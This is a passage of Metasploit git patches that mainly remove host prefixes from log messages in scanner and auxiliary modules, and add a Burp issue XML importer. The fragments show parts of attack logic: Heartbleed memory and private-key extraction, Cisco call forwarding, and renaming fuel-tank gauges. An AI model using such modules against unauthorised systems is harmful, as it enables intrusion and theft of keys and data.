CVE-2015-0240.") + print_good("The target appears to be vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Detected - print_status("#{peer} - The target appears to be running Samba.") + print_status("The target appears to be running Samba.") else - print_status("#{peer} - The target appears to be safe") + print_status("The target appears to be safe") end end diff --git a/modules/auxiliary/scanner/smtp/smtp_relay.rb b/modules/auxiliary/scanner/smtp/smtp_relay.rb index 1c5be24aad..cac03b0b94 100644 --- a/modules/auxiliary/scanner/smtp/smtp_relay.rb +++ b/modules/auxiliary/scanner/smtp/smtp_relay.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary begin connect banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) - print_status("#{peer} - SMTP #{banner_sanitized}") + print_status("SMTP #{banner_sanitized}") report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner) if datastore['EXTENDED'] @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary do_test_relay(nil, "MAIL FROM:<#{datastore['MAILFROM']}>", "RCPT TO:<#{datastore['MAILTO']}>") end rescue - print_error("#{peer} - Unable to establish an SMTP session") + print_error("Unable to establish an SMTP session") return end end @@ -86,36 +86,36 @@ class Metasploit3 < Msf::Auxiliary connect res = raw_send_recv("EHLO X\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailfrom}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailto}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("DATA\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") if res =~ /250/ if testnumber.nil? - print_good("#{peer} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") else - print_good("#{peer} - Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") end else if testnumber.nil? - print_status "#{peer} - No relay detected" + print_status "No relay detected" else - print_status "#{peer} - Test ##{testnumber} - No relay detected" + print_status "Test ##{testnumber} - No relay detected" end end rescue - print_error("#{peer} - Test ##{testnumber} - Unable to establish an SMTP session") + print_error("Test ##{testnumber} - Unable to establish an SMTP session") return end end diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb index 69f1e4cfa4..7b727ef94c 100644 --- a/modules/auxiliary/scanner/ssl/openssl_ccs.rb +++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb @@ -123,16 +123,16 @@ class Metasploit3 < Msf::Auxiliary connect_result = establish_connect return if connect_result.nil? - vprint_status("#{peer} - Sending CCS...") + vprint_status("Sending CCS...") sock.put(ccs) alert = sock.get_once(-1, response_timeout) if alert.blank? - print_good("#{peer} - No alert after invalid CCS message, probably vulnerable") + print_good("No alert after invalid CCS message, probably vulnerable") report elsif alert.unpack("C").first == ALERT_RECORD_TYPE - vprint_error("#{peer} - Alert record as response to the invalid CCS Message, probably not vulnerable") + vprint_error("Alert record as response to the invalid CCS Message, probably not vulnerable") elsif alert - vprint_warning("#{peer} - Unexpected response.") + vprint_warning("Unexpected response.") end end @@ -181,18 +181,18 @@ class Metasploit3 < Msf::Auxiliary def establish_connect connect - vprint_status("#{peer} - Sending Client Hello...") + vprint_status("Sending Client Hello...") sock.put(client_hello) server_hello = sock.get_once(-1, response_timeout) unless server_hello - vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...") + vprint_error("No Server Hello after #{response_timeout} seconds...") disconnect return nil end unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE - vprint_error("#{peer} - Server Hello Not Found") + vprint_error("Server Hello Not Found") return nil end diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 6d1a466b31..409c8722ad 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -177,7 +177,7 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(ip) @check_only = true - vprint_status "#{peer} - Checking for Heartbleed exposure" + vprint_status "Checking for Heartbleed exposure" if bleed Exploit::CheckCode::Appears else @@ -339,13 +339,13 @@ class Metasploit3 < Msf::Auxiliary if jabber_host && jabber_host[1] disconnect establish_connect - vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") + vprint_status("Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") sock.put(jabber_connect_msg(jabber_host[1])) res = get_data end end if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['"]urn:ietf:params:xml:ns:xmpp-tls['"]/ - vprint_error("#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.") if res && res.include?('host-unknown') + vprint_error("Jabber host unknown. Please try changing the XMPPDOMAIN option.") if res && res.include?('host-unknown') return nil end msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>" @@ -364,7 +364,7 @@ class Metasploit3 < Msf::Auxiliary return nil if res.nil? if res !~ /^234/ # res contains the error message - vprint_error("#{peer} - FTP error: #{res.strip}") + vprint_error("FTP error: #{res.strip}") return nil end res @@ -408,21 +408,21 @@ class Metasploit3 < Msf::Auxiliary connect unless tls_callback == 'None' - vprint_status("#{peer} - Trying to start SSL via #{tls_callback}") + vprint_status("Trying to start SSL via #{tls_callback}") res = self.send(TLS_CALLBACKS[tls_callback]) if res.nil? - vprint_error("#{peer} - STARTTLS failed...") + vprint_error("STARTTLS failed...") return nil end end - vprint_status("#{peer} - Sending Client Hello...") + vprint_status("Sending Client Hello...") sock.put(client_hello) server_resp = get_server_hello if server_resp.nil? - vprint_error("#{peer} - Server Hello Not Found") + vprint_error("Server Hello Not Found") return nil end @@ -442,11 +442,11 @@ class Metasploit3 < Msf::Auxiliary connect_result = establish_connect return if connect_result.nil? - vprint_status("#{peer} - Sending Heartbeat...") + vprint_status("Sending Heartbeat...") sock.put(heartbeat_request(heartbeat_length)) hdr = get_data(SSL_RECORD_HEADER_SIZE) if hdr.nil? || hdr.empty? - vprint_error("#{peer} - No Heartbeat response...") + vprint_error("No Heartbeat response...") disconnect return end @@ -470,19 +470,19 @@ class Metasploit3 < Msf::Auxiliary else msg = 'Unknown error' end - vprint_error("#{peer} - #{msg}") + vprint_error("#{msg}") disconnect return end unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version] - vprint_error("#{peer} - Unexpected Heartbeat response header (#{to_hex_string(hdr)})") + vprint_error("Unexpected Heartbeat response header (#{to_hex_string(hdr)})") disconnect return end heartbeat_data = get_data(heartbeat_length) - vprint_status("#{peer} - Heartbeat response, #{heartbeat_data.length} bytes") + vprint_status("Heartbeat response, #{heartbeat_data.length} bytes") disconnect heartbeat_data end @@ -491,11 +491,11 @@ class Metasploit3 < Msf::Auxiliary def loot_and_report(heartbeat_data) unless heartbeat_data - vprint_error("#{peer} - Looks like there isn't leaked information...") + vprint_error("Looks like there isn't leaked information...") return end - print_good("#{peer} - Heartbeat response with leak") + print_good("Heartbeat response with leak") report_vuln({ :host => rhost, :port => rport, @@ -519,7 +519,7 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed server memory' ) - print_status("#{peer} - Heartbeat data stored in #{path}") + print_status("Heartbeat data stored in #{path}") end # Convert non-printable characters to periods @@ -536,7 +536,7 @@ class Metasploit3 < Msf::Auxiliary end # Show abbreviated data - vprint_status("#{peer} - Printable info leaked:\n#{abbreviated_data}") + vprint_status("Printable info leaked:\n#{abbreviated_data}") end @@ -550,24 +550,24 @@ class Metasploit3 < Msf::Auxiliary disconnect return if connect_result.nil? - print_status("#{peer} - Scanning for private keys") + print_status("Scanning for private keys") count = 0 - print_status("#{peer} - Getting public key constants...") + print_status("Getting public key constants...") n, e = get_ne if n.nil? || e.nil? - print_error("#{peer} - Failed to get public key, aborting.") + print_error("Failed to get public key, aborting.") end - vprint_status("#{peer} - n: #{n}") - vprint_status("#{peer} - e: #{e}") - print_status("#{peer} - #{Time.now.getutc} - Starting.") + vprint_status("n: #{n}") + vprint_status("e: #{e}") + print_status("#{Time.now.getutc} - Starting.") max_keytries.times { # Loop up to MAX_KEYTRIES times, looking for keys if count % status_every == 0 - print_status("#{peer} - #{Time.now.getutc} - Attempt #{count}...") + print_status("#{Time.now.getutc} - Attempt #{count}...") end bleedresult = bleed @@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary unless p.nil? || q.nil? key = key_from_pqe(p, q, e) - print_good("#{peer} - #{Time.now.getutc} - Got the private key") + print_good("#{Time.now.getutc} - Got the private key") print_status(key.export) path = store_loot( @@ -588,18 +588,18 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed Private Key' ) - print_status("#{peer} - Private key stored in #{path}") + print_status("Private key stored in #{path}") return end count += 1 } - print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") + print_error("Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") end # Returns the N and E params from the public server certificate def get_ne unless @cert - print_error("#{peer} - No certificate found") + print_error("No certificate found") return end @@ -619,7 +619,7 @@ class Metasploit3 < Msf::Auxiliary # Only try candidates that have a chance... q, rem = n / can if rem == 0 && can != n - vprint_good("#{peer} - Found factor at offset #{x.to_s(16)}") + vprint_good("Found factor at offset #{x.to_s(16)}") p = can return p, q end @@ -692,7 +692,7 @@ class Metasploit3 < Msf::Auxiliary hdr = get_data(SSL_RECORD_HEADER_SIZE) unless hdr - vprint_error("#{peer} - No SSL record header received after #{response_timeout} seconds...") + vprint_error("No SSL record header received after #{response_timeout} seconds...") return nil end @@ -700,7 +700,7 @@ class Metasploit3 < Msf::Auxiliary data = get_data(len) unless data - vprint_error("#{peer} - No SSL record contents received after #{response_timeout} seconds...") + vprint_error("No SSL record contents received after #{response_timeout} seconds...") return nil end diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb index b3de7313ce..54bf04b7c3 100644 --- a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb +++ b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary uri = normalize_uri(target_uri.to_s) mac = datastore["MAC"] - print_status("#{peer} - Getting fintnumbers and display names of the IP phone") + print_status("Getting fintnumbers and display names of the IP phone") res = send_request_cgi( { @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/ - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") print_status("#{res}") return [] end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary end lines.size.times do |i| - print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") + print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") end fint_numbers @@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary end if fint_numbers.empty? - print_error("#{peer} - FINTNUMBER required to forward calls") + print_error("FINTNUMBER required to forward calls") return end fint_numbers.each do |fintnumber| - print_status("#{peer} - Sending call forward request for #{fintnumber}") + print_status("Sending call forward request for #{fintnumber}") send_request_cgi( { @@ -138,9 +138,9 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.body && res.body && res.body.to_s =~ /CFA/ - print_good("#{peer} - Call forwarded successfully for #{fintnumber}") + print_good("Call forwarded successfully for #{fintnumber}") else - print_status("#{peer} - Call forward failed.") + print_status("Call forward failed.") end end end diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index ae40518cd1..cccf08529f 100644 --- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/ return Exploit::CheckCode::Vulnerable, res else - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") return Exploit::CheckCode::Safe, res end end @@ -98,17 +98,17 @@ class Metasploit3 < Msf::Auxiliary info << "Name: #{names[i].split(":")[1]}, " info << "Telephone: #{phones[i]}" - print_good("#{peer} - #{info}") + print_good("#{info}") end else - print_status("#{peer} - No Speed Dial detected") + print_status("No Speed Dial detected") end end def list mac = datastore['MAC'] - print_status("#{peer} - Getting Speed Dials of the IP phone") + print_status("Getting Speed Dials of the IP phone") vars_get = { 'device' => "SEP#{mac}" } @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", 'telno' => "#{telno}", @@ -134,11 +134,11 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body && res.body.to_s =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary mac = datastore['MAC'] position = datastore['POSITION'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", @@ -156,9 +156,9 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") + print_good("Speed Dial #{position} is deleted successfully") else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", @@ -178,8 +178,8 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_good("Speed Dial #{position} is deleted successfully") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", @@ -192,14 +192,14 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end end From 47c0a3b4a71418c4b80b16119d7188cfa918aa73 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 1 Feb 2016 16:21:10 -0600 Subject: [PATCH 34/71] Get some stragglers that had a different format --- modules/auxiliary/admin/atg/atg_client.rb | 8 ++++---- modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb | 12 ++++++------ modules/auxiliary/scanner/rdp/ms12_020_check.rb | 4 ++-- modules/auxiliary/scanner/rsync/modules_list.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_version.rb | 8 ++++---- 5 files changed, 17 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/admin/atg/atg_client.rb b/modules/auxiliary/admin/atg/atg_client.rb index 5560f2f76d..357338b434 100644 --- a/modules/auxiliary/admin/atg/atg_client.rb +++ b/modules/auxiliary/admin/atg/atg_client.rb @@ -225,9 +225,9 @@ class Metasploit3 < Msf::Auxiliary when 'SET_TANK_NAME' # send the set tank name command to change the tank name(s) if tank_number == 0 - vprint_status("#{peer} -- setting all tank names to #{tank_name}") + vprint_status("Setting all tank names to #{tank_name}") else - vprint_status("#{peer} -- setting tank ##{tank_number}'s name to #{tank_name}") + vprint_status("Setting tank ##{tank_number}'s name to #{tank_name}") end request = "#{action.opts[protocol_opt_name]}#{format('%02d', tank_number)}#{tank_name}\n" sock.put(request) @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # send an inventory probe to show that it succeeded inventory_probe = "#{actions.find { |a| a.name == 'INVENTORY' }.opts[protocol_opt_name]}\n" inventory_response = get_response(inventory_probe) - message = "#{peer} #{protocol} #{action.opts['Description']}:\n#{inventory_response}" + message = "#{protocol} #{action.opts['Description']}:\n#{inventory_response}" if inventory_response.include?(tank_name) print_good message else @@ -245,7 +245,7 @@ class Metasploit3 < Msf::Auxiliary end else response = get_response("#{action.opts[protocol_opt_name]}\n") - print_good("#{peer} #{protocol} #{action.opts['Description']}:\n#{response}") + print_good("#{protocol} #{action.opts['Description']}:\n#{response}") end ensure disconnect diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index 405e6e1851..21e6d9ffb1 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb @@ -51,14 +51,14 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(_ip) - print_status("#{peer}: Checking for DLSw information disclosure (CVE-2014-7992)") + print_status("Checking for DLSw information disclosure (CVE-2014-7992)") response = get_response if response.blank? - vprint_status("#{peer}: no response") + vprint_status("No response") Exploit::CheckCode::Safe elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48" - vprint_good("#{peer}: Detected DLSw protocol") + vprint_good("Detected DLSw protocol") report_service( host: rhost, port: rport, @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary # TODO: check that response has something that truly indicates it is vulnerable # and not simply that it responded unless response[18..72].scan(/\x00/).length == 54 - print_good("#{peer}: vulnerable to DLSw information disclosure; leaked #{response.length} bytes") + print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes") report_vuln( host: rhost, port: rport, @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary Exploit::CheckCode::Vulnerable end else - vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data") + vprint_status("#{response.size}-byte response didn't contain any leaked data") Exploit::CheckCode::Safe end end @@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary 'DLSw_leaked_data', 'DLSw packet memory leak' ) - print_status("#{peer}: DLSw leaked data stored in #{path}") + print_status("DLSw leaked data stored in #{path}") end end diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index d9fca848d7..f9174649d9 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary def check_rdp # code to check if RDP is open or not - vprint_status("#{peer} Verifying RDP protocol...") + vprint_status("Verifying RDP protocol...") # send connection sock.put(connection_request) @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary def check_rdp_vuln # check if rdp is open unless check_rdp - vprint_status "#{peer} Could not connect to RDP." + vprint_status "Could not connect to RDP." return Exploit::CheckCode::Unknown end diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 547e102a79..9bdfaaf4f5 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary begin modules_metadata = rsync_list rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} -- error while listing modules: #{e}") + vprint_error("Error while listing modules: #{e}") return ensure disconnect diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index 5371196d34..885d224e51 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary resp = sock.get_once(-1, timeout) if ! resp - vprint_warning("#{peer} no response") + vprint_warning("No response") return end @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary info = "" if /^SSH-\d+\.\d+-(.*)$/ !~ ident - vprint_warning("#{peer} was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") + vprint_warning("Was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") return end @@ -85,11 +85,11 @@ class Metasploit3 < Msf::Auxiliary end end - print_status("#{peer} SSH server version: #{ident}#{info}") + print_status("SSH server version: #{ident}#{info}") report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ident) end rescue Timeout::Error - vprint_warning("#{peer} timed out after #{timeout} seconds. Skipping.") + vprint_warning("Timed out after #{timeout} seconds. Skipping.") ensure disconnect end From 208420d7410bb90c173dde5635a9007c0dff629c Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 2 Feb 2016 10:02:32 -0600 Subject: [PATCH 35/71] Sort methods --- lib/msf/core/exploit/udp.rb | 25 ++++++++++++------------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/exploit/udp.rb b/lib/msf/core/exploit/udp.rb index 2a7eedce31..8b503dc4cd 100644 --- a/lib/msf/core/exploit/udp.rb +++ b/lib/msf/core/exploit/udp.rb @@ -107,17 +107,17 @@ module Exploit::Remote::Udp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the local port for outgoing connections # - def rport - datastore['RPORT'] + def cport + datastore['CPORT'] end # @@ -135,20 +135,19 @@ module Exploit::Remote::Udp end # - # Returns the local host for outgoing connections + # Returns the target host # - def chost - datastore['CHOST'] + def rhost + datastore['RHOST'] end # - # Returns the local port for outgoing connections + # Returns the remote port # - def cport - datastore['CPORT'] + def rport + datastore['RPORT'] end - protected attr_accessor :udp_sock From 4dcbd7c1aebcfa83d16f9264cdcc95227a276d7f Mon Sep 17 00:00:00 2001 From: Brian Patterson <Brian_Patterson@rapid7.com> Date: Mon, 1 Feb 2016 16:11:06 -0600 Subject: [PATCH 36/71] Add a nokogiri xml stream parser for Burp issue xml and rename original burp parser to burp session parser so both are supported. --- lib/msf/core/db_manager/import.rb | 9 +- lib/msf/core/db_manager/import/burp_issue.rb | 20 +++ .../import/{burp.rb => burp_session.rb} | 2 +- lib/msf/ui/console/command_dispatcher/db.rb | 1 + lib/rex/parser/burp_issue_nokogiri.rb | 139 ++++++++++++++++++ lib/rex/parser/burp_session_nokogiri.rb | 2 +- lib/rex/parser/nokogiri_doc_mixin.rb | 5 + .../ui/console/command_dispatcher/db_spec.rb | 1 + 8 files changed, 175 insertions(+), 4 deletions(-) create mode 100644 lib/msf/core/db_manager/import/burp_issue.rb rename lib/msf/core/db_manager/import/{burp.rb => burp_session.rb} (96%) create mode 100644 lib/rex/parser/burp_issue_nokogiri.rb diff --git a/lib/msf/core/db_manager/import.rb b/lib/msf/core/db_manager/import.rb index c93fb6cb5b..c5a0e9d8d4 100644 --- a/lib/msf/core/db_manager/import.rb +++ b/lib/msf/core/db_manager/import.rb @@ -16,7 +16,8 @@ module Msf::DBManager::Import autoload :Acunetix, 'msf/core/db_manager/import/acunetix' autoload :Amap, 'msf/core/db_manager/import/amap' autoload :Appscan, 'msf/core/db_manager/import/appscan' - autoload :Burp, 'msf/core/db_manager/import/burp' + autoload :BurpIssue, 'msf/core/db_manager/import/burp_issue' + autoload :BurpSession, 'msf/core/db_manager/import/burp_session' autoload :CI, 'msf/core/db_manager/import/ci' autoload :Foundstone, 'msf/core/db_manager/import/foundstone' autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm' @@ -41,7 +42,8 @@ module Msf::DBManager::Import include Msf::DBManager::Import::Acunetix include Msf::DBManager::Import::Amap include Msf::DBManager::Import::Appscan - include Msf::DBManager::Import::Burp + include Msf::DBManager::Import::BurpIssue + include Msf::DBManager::Import::BurpSession include Msf::DBManager::Import::CI include Msf::DBManager::Import::Foundstone include Msf::DBManager::Import::FusionVM @@ -267,6 +269,9 @@ module Msf::DBManager::Import elsif (data[0,1024] =~ /<!ATTLIST\s+items\s+burpVersion/) @import_filedata[:type] = "Burp Session XML" return :burp_session_xml + elsif (data[0,1024] =~ /<!ATTLIST\s+issues\s+burpVersion/) + @import_filedata[:type] = "Burp Issue XML" + return :burp_issue_xml elsif (firstline.index("<?xml")) # it's xml, check for root tags we can handle line_count = 0 diff --git a/lib/msf/core/db_manager/import/burp_issue.rb b/lib/msf/core/db_manager/import/burp_issue.rb new file mode 100644 index 0000000000..b043d32714 --- /dev/null +++ b/lib/msf/core/db_manager/import/burp_issue.rb @@ -0,0 +1,20 @@ +require 'rex/parser/burp_issue_nokogiri' + +module Msf::DBManager::Import::BurpIssue + def import_burp_issue_xml(args={}, &block) + bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] + wspace = args[:wspace] || workspace + parser = "Nokogiri v#{::Nokogiri::VERSION}" + noko_args = args.dup + noko_args[:blacklist] = bl + noko_args[:wspace] = wspace + if block + yield(:parser, parser) + doc = Rex::Parser::BurpIssueDocument.new(args,framework.db) {|type, data| yield type,data } + else + doc = Rex::Parser::BurpIssueDocument.new(args,self) + end + parser = ::Nokogiri::XML::SAX::Parser.new(doc) + parser.parse(args[:data]) + end +end diff --git a/lib/msf/core/db_manager/import/burp.rb b/lib/msf/core/db_manager/import/burp_session.rb similarity index 96% rename from lib/msf/core/db_manager/import/burp.rb rename to lib/msf/core/db_manager/import/burp_session.rb index aa5e2f54a8..cbed07fee3 100644 --- a/lib/msf/core/db_manager/import/burp.rb +++ b/lib/msf/core/db_manager/import/burp_session.rb @@ -1,6 +1,6 @@ require 'rex/parser/burp_session_nokogiri' -module Msf::DBManager::Import::Burp +module Msf::DBManager::Import::BurpSession def import_burp_session_noko_stream(args={},&block) if block doc = Rex::Parser::BurpSessionDocument.new(args,framework.db) {|type, data| yield type,data } diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index f3c36e8463..adf95b3f6a 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1647,6 +1647,7 @@ class Db print_line " Amap Log -m" print_line " Appscan" print_line " Burp Session XML" + print_line " Burp Issue XML" print_line " CI" print_line " Foundstone" print_line " FusionVM XML" diff --git a/lib/rex/parser/burp_issue_nokogiri.rb b/lib/rex/parser/burp_issue_nokogiri.rb new file mode 100644 index 0000000000..c14ec9c869 --- /dev/null +++ b/lib/rex/parser/burp_issue_nokogiri.rb @@ -0,0 +1,139 @@ +# -*- coding: binary -*- +require "rex/parser/nokogiri_doc_mixin" +require 'uri' + +module Rex + module Parser + + # If Nokogiri is available, define Burp Issue document class. + load_nokogiri && class BurpIssueDocument < Nokogiri::XML::SAX::Document + + include NokogiriDocMixin + + def start_element(name=nil,attrs=[]) + attrs = normalize_attrs(attrs) + block = @block + @state[:current_tag][name] = true + case name + when "host", "name", "info", "issueDetail", "references" + @state[:has_text] = true + end + end + + def end_element(name=nil) + block = @block + case name + when "issue" + report_web_host_info + report_web_service_info + report_vuln + # Reset the state once we close a host + @state = @state.select {|k| [:current_tag].include? k} + when "host" + @state[:has_text] = false + collect_host_info + @text = nil + when "name" + @state[:has_text] = false + collect_name + @text = nil + when "issueDetail" + @state[:has_text] = false + collect_issue_detail + @text = nil + when "references" + @state[:has_text] = false + collect_references + @text = nil + end + @state[:current_tag].delete name + end + + def collect_host_info + return unless in_issue + return unless has_text + uri = URI(@text) + + @state[:host] = uri.host + @state[:service_name] = uri.scheme + @state[:proto] = "tcp" + + case @state[:service_name] + when "http" + @state[:port] = 80 + when "https" + @state[:port] = 443 + end + end + + def collect_name + return unless in_issue + return unless has_text + @state[:vuln_name] = @text + end + + def collect_issue_detail + return unless in_issue + return unless has_text + @state[:issue_detail] = @text + end + + def collect_references + return unless in_issue + return unless has_text + uri = @text.match('href=[\'"]?([^\'" >]+)')[1] + @state[:refs] = ["URI-#{uri}"] + end + + def report_web_host_info + return unless @state[:host] + address = Rex::Socket.resolv_to_dotted(@state[:host]) rescue nil + host_info = {:workspace => @args[:wspace]} + host_info[:address] = address + host_info[:name] = @state[:host] + db_report(:host, host_info) + end + + def report_web_service_info + return unless @state[:host] + return unless @state[:port] + return unless @state[:proto] + return unless @state[:service_name] + service_info = {} + service_info[:host] = @state[:host] + service_info[:port] = @state[:port] + service_info[:proto] = 